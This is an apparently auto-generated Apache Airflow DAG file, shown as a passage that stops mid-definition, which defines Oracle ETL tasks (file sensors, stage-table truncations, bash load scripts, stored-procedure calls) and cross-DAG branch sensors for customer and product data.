# JOB_TYPE=SQL
my_taskid = "UC_Project_Decision_Customer"
UC_Project_Decision_Customer = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_NA_Customer_Sub_Group_WH"
ODS_UC_NA_Customer_Sub_Group_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_NA_Customer_Sub_Group_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_NA_Customer_Sub_Group_STG"
UC_NA_Customer_Sub_Group_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_NA_Customer_Sub_Group"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_NA_Customer_Sub_Group_LD"
ODS_UC_NA_Customer_Sub_Group_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_NA_Customer_Sub_Group"
)
# JOB_TYPE=SQL
my_taskid = "UC_NA_Customer_Sub_Group"
UC_NA_Customer_Sub_Group = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Group_Customer_Industry_Type_WH"
ODS_UC_Group_Customer_Industry_Type_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Group_Customer_Industry_Type_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Group_Customer_Industry_Type_STG"
UC_Group_Customer_Industry_Type_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Group_Customer_Industry_Type"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Group_Customer_Industry_Type_LD"
ODS_UC_Group_Customer_Industry_Type_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Group_Customer_Industry_Type"
)
# JOB_TYPE=SQL
my_taskid = "UC_Group_Customer_Industry_Type"
UC_Group_Customer_Industry_Type = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Global_Telecom_Operator_WH"
ODS_UC_Global_Telecom_Operator_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Global_Telecom_Operator_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Global_Telecom_Operator_STG"
UC_Global_Telecom_Operator_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Global_Telecom_Operator"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Global_Telecom_Operator_LD"
ODS_UC_Global_Telecom_Operator_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Global_Telecom_Operator"
)
# JOB_TYPE=SQL
my_taskid = "UC_Global_Telecom_Operator"
UC_Global_Telecom_Operator = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Product_Mapping_Table_WH"
ODS_UC_Product_Mapping_Table_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Product_Mapping_Table_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Product_Mapping_Table_STG"
UC_Product_Mapping_Table_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Product_Mapping_Table"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Product_Mapping_Table_LD"
ODS_UC_Product_Mapping_Table_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Product_Mapping_Table"
)
# JOB_TYPE=SQL
my_taskid = "UC_Product_Mapping_Table"
UC_Product_Mapping_Table = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Market_Share_Market_Shipment_WH"
ODS_UC_Market_Share_Market_Shipment_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Market_Share_Market_Shipment_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Market_Share_Market_Shipment_STG"
UC_Market_Share_Market_Shipment_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Market_Share_Market_Shipment"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Market_Share_Market_Shipment_LD"
ODS_UC_Market_Share_Market_Shipment_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Market_Share_Market_Shipment"
)
# JOB_TYPE=SQL
my_taskid = "UC_Market_Share_Market_Shipment"
UC_Market_Share_Market_Shipment = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_WH"
ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_WNC_BI_SHIPMENT_QTY_TABLE_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_WNC_BI_SHIPMENT_QTY_TABLE_STG"
UC_WNC_BI_SHIPMENT_QTY_TABLE_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_WNC_BI_SHIPMENT_QTY_TABLE"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_LD"
ODS_UC_WNC_BI_SHIPMENT_QTY_TABLE_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_WNC_BI_SHIPMENT_QTY_TABLE"
)
# JOB_TYPE=SQL
my_taskid = "UC_WNC_BI_SHIPMENT_QTY_TABLE"
UC_WNC_BI_SHIPMENT_QTY_TABLE = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Product_Segment_Map_table_WH"
ODS_UC_Product_Segment_Map_table_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Product_Segment_Map_table_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Product_Segment_Map_table_STG"
UC_Product_Segment_Map_table_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Product_Segment_Map_table"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Product_Segment_Map_table_LD"
ODS_UC_Product_Segment_Map_table_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Product_Segment_Map_table"
)
# JOB_TYPE=SQL
my_taskid = "UC_Product_Segment_Map_table"
UC_Product_Segment_Map_table = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_Market_Tam_Product_Map_WH"
ODS_UC_Market_Tam_Product_Map_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=M_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_Market_Tam_Product_Map_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_Market_Tam_Product_Map_STG"
UC_Market_Tam_Product_Map_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_Market_Tam_Product_Map"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_Market_Tam_Product_Map_LD"
ODS_UC_Market_Tam_Product_Map_LD = BashOperator(
task_id=my_taskid,
dag=M_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_Market_Tam_Product_Map"
)
# JOB_TYPE=SQL
my_taskid = "UC_Market_Tam_Product_Map"
UC_Market_Tam_Product_Map = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=M_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
# JOB_TYPE=WATCH
my_taskid = "ODS_UC_SW_Centric_Product_Model_WH"
ODS_UC_SW_Centric_Product_Model_WH = FileSensor(
pool = "file_pool",
task_id=my_taskid,
dag=Y_ODS_CUS,
filepath= "{{ var.value.DIR_SOURCE }}UPD/CUS/UC_SW_Centric_Product_Model_{{ds_nodash}}.D"
)
# JOB_TYPE=ISQL
my_taskid = "UC_SW_Centric_Product_Model_STG"
UC_SW_Centric_Product_Model_STG = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=Y_ODS_CUS,
sql= "TRUNCATE TABLE STAGE.UC_SW_Centric_Product_Model"
)
# JOB_TYPE=ODS-UIMP
my_taskid = "ODS_UC_SW_Centric_Product_Model_LD"
ODS_UC_SW_Centric_Product_Model_LD = BashOperator(
task_id=my_taskid,
dag=Y_ODS_CUS,
bash_command="{{var.value.DIR_BIN}}ods_ora_imp.sh {{var.value.ETLUSER}} {{var.value.ETLPWD}} {{var.value.DW_HOST}} {{var.value.DIR_ETLBASE}} {{ds_nodash}} UPD CUS UC_SW_Centric_Product_Model"
)
# JOB_TYPE=SQL
my_taskid = "UC_SW_Centric_Product_Model"
UC_SW_Centric_Product_Model = OracleOperatorWithTemplatedParams(
task_id=my_taskid,
dag=Y_ODS_CUS,
parameters=({":END_DT_CHAR":"{{ ds_nodash }}"}),
sql= "Begin SQLEXT." + my_taskid + "_SP("+
":END_DT_CHAR"+
"); End;"
)
ExternalTaskSensor.ui_color = 'white'
ExternalTaskSensor.ui_fgcolor = 'blue'
# tmpl_search_path = Variable.get("sql_path")
# XSLT:loop: JOB_FLOW_NAME-and-PRE_JOB: External:START{{
def branch_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG","D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG","D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_PRD_SRC,
provide_context=True,
)
my_taskid = "proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_ODS_PRD_SRC,
)
# Cross dag sensor
my_taskid = "D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG"
D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_PRD_SRC,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG)
D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL"
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="XXPLM_MODEL",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL)
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B","D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B","D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B"
D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="MTL_SYSTEM_ITEMS_B",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B)
D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B)
def branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_PRD_SRC")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE","D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"]
return ["proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"]
my_taskid = "BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE"
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_PRD_SRC",
external_task_id="XXPLM_EC_CHANGE_TYPE",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE)
BRANCH_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE.set_downstream(D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE)
D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE.set_downstream(proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE)
def branch_D_SDM_PRDxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG","D_SDM_PRDxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG","D_SDM_PRDxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_SDM_PRDxD_STG_INIT__SYS_STS_STG"
BRANCH_D_SDM_PRDxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_STG_INIT__SYS_STS_STG,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG"
proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_STG_INIT__SYS_STS_STG"
D_SDM_PRDxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_SDM_PRD,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_SDM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG)
BRANCH_D_SDM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(D_SDM_PRDxD_STG_INIT__SYS_STS_STG)
D_SDM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG)
def branch_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_SDM_FIN")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT","D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT","D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"]
return ["proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"]
my_taskid = "BRANCH_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"
BRANCH_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT,
dag=D_SDM_PRD,
provide_context=True,
)
my_taskid = "proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_SDM_PRD,
)
# Cross dag sensor
my_taskid = "D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT"
D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
